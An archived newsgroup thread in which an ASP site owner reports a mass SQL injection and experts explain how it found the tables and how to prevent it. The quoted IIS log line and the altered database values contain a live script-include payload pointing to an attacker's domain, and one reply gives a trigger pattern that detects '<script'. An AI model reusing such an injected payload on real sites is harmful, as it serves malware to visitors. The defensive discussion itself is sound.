- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Highe r%20And%20Higher&artist=Michael%20McDonald&type=%2 5&category=%25&column=t_asc%3Cscript%20src= http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
My table was evidently hit with SQL Injection. I searched the IIS logs and
found hundreds of the below instances. Questions...
1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what's inside, but it
wasn't available.
What could have been in the js file to cause such an update?
2) I don't see how they could have known the Table name or the column names.
Same question as #1 I guess.
3) I was and still am using a stored procedure on that page to SELECT from
the table. How do I stop similar malicious efforts from happening again?
thanks 16  2212 
shank wrote:
- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Highe r%20And%20Higher&artist=Michael%20McDonald&type=%2 5&category=%25&column=t_asc%3Cscript%20src=
http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
My table was evidently hit with SQL Injection. I searched the IIS
logs and found hundreds of the below instances. Questions...
1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what's inside,
but it wasn't available.
What could have been in the js file to cause such an update?
http://mvp.unixwiz.net/techtips/sql-injection.html http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23 http://www.nextgenss.com/papers/adva..._injection.pdf http://www.nextgenss.com/papers/more..._injection.pdf
2) I don't see how they could have known the Table name or the column
names. Same question as #1 I guess.
Same answer - by causing error messagess that poor coding practice allow to
be returned to the user.
>
3) I was and still am using a stored procedure on that page to SELECT
from the table. How do I stop similar malicious efforts from happening
again?
Use parameters: http://groups.google.com/group/micro...fedf4e1efd63a6
--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
"Bob Barrows [MVP]" wrote:
shank wrote:
2) I don't see how they could have known the Table name or the column
names. Same question as #1 I guess.
Same answer - by causing error messagess that poor coding practice allow to
be returned to the user.
No, not really. Oh, it's poor coding practice, but the original injection
(not seen here) is code that goes and reads the system tables and tries to
discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT
field names and *THEN* injects the JavaScript into all those fields.
It's pretty sophisiticated, actually. But it's easily protected against by
simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)
If you care, I think I can find a copy of the actual injection attack code
still lurking, showing how it loops on all the tables and fields.
"Old Pedant" <Ol*******@discussions.microsoft.comwrote in message
news:EF**********************************@microsof t.com...
Here's an example of how it was originally injected into at least one web
site and thus database:
http://www.aspmessageboard.com/forum...997&P=1#894984
The next post is my decoding of that and then Xander's post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
The interesting thing is that ww.aspfaq.com, which is mentioned in the
thread you linked to appears to have been a victim of something similar.
Google results warn that aspfaq may harm your computer....
--
Mike Brind
Microsoft MVP - ASP/ASP.NET
"Mike Brind [MVP]" <pa*******@hotmail.comwrote in message
news:eP**************@TK2MSFTNGP04.phx.gbl...
>
"Old Pedant" <Ol*******@discussions.microsoft.comwrote in message
news:EF**********************************@microsof t.com...
>Here's an example of how it was originally injected into at least one web
site and thus database:
http://www.aspmessageboard.com/forum...997&P=1#894984
The next post is my decoding of that and then Xander's post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
The interesting thing is that ww.aspfaq.com, which is mentioned in the
thread you linked to appears to have been a victim of something similar.
Google results warn that aspfaq may harm your computer....
Ah. Not the one mentioned in the thread (which is plural).... but the one
that is frequently linked to from here.
Old Pedant wrote:
"Bob Barrows [MVP]" wrote:
>shank wrote:
>>2) I don't see how they could have known the Table name or the
column names. Same question as #1 I guess.
Same answer - by causing error messagess that poor coding practice
allow to be returned to the user.
No, not really. Oh, it's poor coding practice, but the original
injection (not seen here) is code that goes and reads the system
tables and tries to discover all user table names and all user
VARCHAR, NVARCHAR, TEXT, NTEXT field names and *THEN* injects the
JavaScript into all those fields.
Yes, that's the other way, and it is covered in the links I provided, which
is what I meant by "same answer".
>
It's pretty sophisiticated, actually. But it's easily protected
against by simply disallowing access to the sytem tables from the
IUSR_xxx and IWAM_xxx accounts.
.... or whatever account is being used to connect to sql server.
(Well, and of course by practicing
good programming of the ASP page in the first place. But even with
poor ASP code, if you set up the DB correctly the particular attack
fails.)
If you care, I think I can find a copy of the actual injection attack
code still lurking, showing how it loops on all the tables and fields.
I've seen it - I just hadn't put the two cases together
--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
Mike Brind [MVP] wrote:
"Mike Brind [MVP]" <pa*******@hotmail.comwrote in message
news:eP**************@TK2MSFTNGP04.phx.gbl...
>>
"Old Pedant" <Ol*******@discussions.microsoft.comwrote in message
news:EF**********************************@microso ft.com...
>>Here's an example of how it was originally injected into at least
one web site and thus database:
http://www.aspmessageboard.com/forum...997&P=1#894984
>>>
The next post is my decoding of that and then Xander's post has a
link to here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
The interesting thing is that ww.aspfaq.com, which is mentioned in
the thread you linked to appears to have been a victim of something
similar. Google results warn that aspfaq may harm your computer....
Ah. Not the one mentioned in the thread (which is plural).... but
the one that is frequently linked to from here.
Oh my! That is embarassing! I know Aaron used to recommend the use of
dynamic sql to execute stored procedures ... I'm sure he followed what
he preached, but I would have thought he knew to use a
limited-privileges account to connect to SQL. I'm going to give him the
benefit of the doubt and place the blame on the company that bought the
aspfaq site from him.
--
Microsoft MVP -- ASP/ASP.NET
Please reply to the newsgroup. The email account listed in my From
header is my spam trap, so I don't check it very often. You will get a
quicker response by posting to the newsgroup.
Mike Brind [MVP] wrote:
"Mike Brind [MVP]" <pa*******@hotmail.comwrote in message
news:eP**************@TK2MSFTNGP04.phx.gbl...
>>
"Old Pedant" <Ol*******@discussions.microsoft.comwrote in message
news:EF**********************************@microso ft.com...
>>Here's an example of how it was originally injected into at least
one web site and thus database:
http://www.aspmessageboard.com/forum...997&P=1#894984
The next post is my decoding of that and then Xander's post has a
link to here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
The interesting thing is that ww.aspfaq.com, which is mentioned in
the thread you linked to appears to have been a victim of something
similar. Google results warn that aspfaq may harm your computer....
They seem to have cleared that up. No more Google warnings there.
--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
"Bob Barrows [MVP]" <re******@NOyahoo.SPAMcomwrote in message
news:ez**************@TK2MSFTNGP05.phx.gbl...
Mike Brind [MVP] wrote:
>"Mike Brind [MVP]" <pa*******@hotmail.comwrote in message
news:eP**************@TK2MSFTNGP04.phx.gbl...
>>>
"Old Pedant" <Ol*******@discussions.microsoft.comwrote in message
news:EF**********************************@micros oft.com...
Here's an example of how it was originally injected into at least
one web site and thus database:
http://www.aspmessageboard.com/forum...997&P=1#894984
The next post is my decoding of that and then Xander's post has a
link to here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
The interesting thing is that ww.aspfaq.com, which is mentioned in
the thread you linked to appears to have been a victim of something
similar. Google results warn that aspfaq may harm your computer....
They seem to have cleared that up. No more Google warnings there.
That is indeed a relief.
Mike
"It's pretty sophisiticated, actually. But it's easily protected against by
simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)"
I aplogize in advance if this is a stupid question, but in SQL Server 2005,
how do you deny access for the IUSR and IWAM accounts?
Thanks,
Adam
"Old Pedant" wrote:
>
"Bob Barrows [MVP]" wrote:
shank wrote:
2) I don't see how they could have known the Table name or the column
names. Same question as #1 I guess.
Same answer - by causing error messagess that poor coding practice allow to
be returned to the user.
No, not really. Oh, it's poor coding practice, but the original injection
(not seen here) is code that goes and reads the system tables and tries to
discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT
field names and *THEN* injects the JavaScript into all those fields.
It's pretty sophisiticated, actually. But it's easily protected against by
simply disallowing access to the sytem tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)
If you care, I think I can find a copy of the actual injection attack code
still lurking, showing how it loops on all the tables and fields.
Adam wrote:
I aplogize in advance if this is a stupid question, but in
SQL Server 2005, how do you deny access for the IUSR and
IWAM accounts?
The same way you do any other accounts. But most of us do not use trusted
connections for our web apps, meaning that the login used in your connection
string should have restricted rights.
In our case, we almost always give that login NO RIGHTS, then grant EXECUTE
permissions on a procedure-byprocedure basis.
--
Dave Anderson
Unsolicited commercial email will be read at a cost of $500 per message. Use
of this email address implies consent to these terms.
I have the solution to this problem...
I work at a news channal. Recently we launch our news websit and it was
DAILY ATTACKED this script. as a result, we used to restore the privous
database backup to avoid this problem. But after research, i have
written a script for every table effected. Now that the website is
smoothly working.
I can provide this solution to you as well, but i will charge money for
it. For contact my e-mail address is ha*************@yahoo.com.
*** Sent via Developersdex http://www.developersdex.com ***
hammad siddiqui wrote:
I have the solution to this problem...
I work at a news channal. Recently we launch our news websit and it
was DAILY ATTACKED this script. as a result, we used to restore the
privous database backup to avoid this problem. But after research, i
have written a script for every table effected. Now that the website
is smoothly working.
I can provide this solution to you as well, but i will charge money
for it. For contact my e-mail address is ha*************@yahoo.com.
LOLOLOLOLOL
ROFL
There are freely available scripts in several places. I hope nobody finances
this leech.
--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
"hammad siddiqui" <ha*************@yahoo.comwrote in message
news:%2****************@TK2MSFTNGP06.phx.gbl...
>
I have the solution to this problem...
I work at a news channal. Recently we launch our news websit and it was
DAILY ATTACKED this script. as a result, we used to restore the privous
database backup to avoid this problem. But after research, i have
written a script for every table effected. Now that the website is
smoothly working.
I can provide this solution to you as well, but i will charge money for
it. For contact my e-mail address is ri**************@yahoo.com.
If I launched a web site that was attacked like this, I would expect to be
fired or sued - not charge people money for fixing my mistakes.
--
Mike Brind
Microsoft MVP - ASP/ASP.NET
It is one type of virus.use trigger and check inserted data.use this
code
Create TRIGGER [Check_Code]
ON [EPI_TenderDetails]
after INSERT,UPDATE
AS
declare
@Bus varchar(150)
BEGIN
-- SET NOCOUNT ON added to prevent extra result sets from
-- interfering with SELECT statements.
SET NOCOUNT ON;
if exists (select * from inserted)
select @Bus=TenderNo from inserted
if @bus like '%<script%' or @bus like '%script>%'
rollback
-- Insert statements for trigger here
END
*** Sent via Developersdex http://www.developersdex.com ***
"subrata roy" wrote:
...if exists (select * from inserted)
select @Bus=TenderNo from inserted
if @bus like '%<script%' or @bus like '%script>%'
rollback
-- Insert statements for trigger here ...
This does not address the core problem. Reaching your trigger implies that
injection has occurred. There is no guarantee that the next attack will use
SCRIPT tags.
For that matter, this nonsense forbids potential legitimate cases for
inserting SCRIPT tags. Imagine if a SQL injection forum kept rejecting your
post because you described the thing it was "protecting itself" against.
Bah.
--
Dave Anderson
Unsolicited commercial email will be read at a cost of $500 per message. Use
of this email address implies consent to these terms. This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics
by: NotGiven |
last post by:
Steve wrote,
> "And read up on "sql injection" attacks (use your favorite search
> engine). As indicated, validate input. e.g. if you expert $_GET
> to be integer, then do
>
> $a =...
|
by: Cogswell |
last post by:
I am working on an ecommerce app and want to be able to take my entire
POST results as one item (or iterate through them) and check for any
malicious SQL INJECTION items. After checking/escaping...
|
by: Bă§TăRĐ |
last post by:
I have been working on this particular project for a little over 2 weeks now. This product contains between 700-900 stored procedures to handle just about all you can imagine within the product. I...
|
by: bregent |
last post by:
I've seen plenty of articles and utilities for preventing form injections for
ASP.NET, but not too much for classic ASP. Are there any good input validation
scripts that you use to avoid form...
|
by: stirrell |
last post by:
Hello,
One problem that I had been having is stopping email injections on
contact forms. I did some research, read up on it and felt like I had
created a working solution. I hadn't gotten any...
|
by: |
last post by:
There are assorted "SQL Injection vulnerability assessment tools" out there.
They scan your site and send your report. They also take your money.
We don't have the money so I was wondering if I...
|
by: =?Utf-8?B?Um9kbmV5IFZpYW5h?= |
last post by:
IIS 6 SQL Injection Sanitation ISAPI Wildcard at
http://www.codeplex.com/IIS6SQLInjection
I created an ISAPI dll application to prevent SQL Injection attempts by
intercepting the HTTP requests...
|
by: Sudhakar |
last post by:
A) validating username in php
as part of a registration form a user fills there desired username and
this is stored in a mysql. there are certain conditions for the
username.
a) the username...
|
by: shank |
last post by:
I've been hit again using DW, parameterized queries and stored procedures.
I'm guessing I was not strict enough with character counts and allowing to
long of a string to pass.
Aside from that,...
|
by: Brian Bozarth |
last post by:
This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home page.
What it's doing is putting in script code at...
|
by: emmanuelkatto |
last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud.
Please let me know.
Thanks!
Emmanuel
|
by: BarryA |
last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
|
by: Sonnysonu |
last post by:
This is the data of csv file
1 2 3
1 2 3
1 2 3
1 2 3
2 3
2 3
3
the lengths should be different i have to store the data by column-wise with in the specific length.
suppose the i have to...
|
by: Hystou |
last post by:
There are some requirements for setting up RAID:
1. The motherboard and BIOS support RAID configuration.
2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
|
by: marktang |
last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
|
by: tracyyun |
last post by:
Dear forum friends,
With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing,...
| |
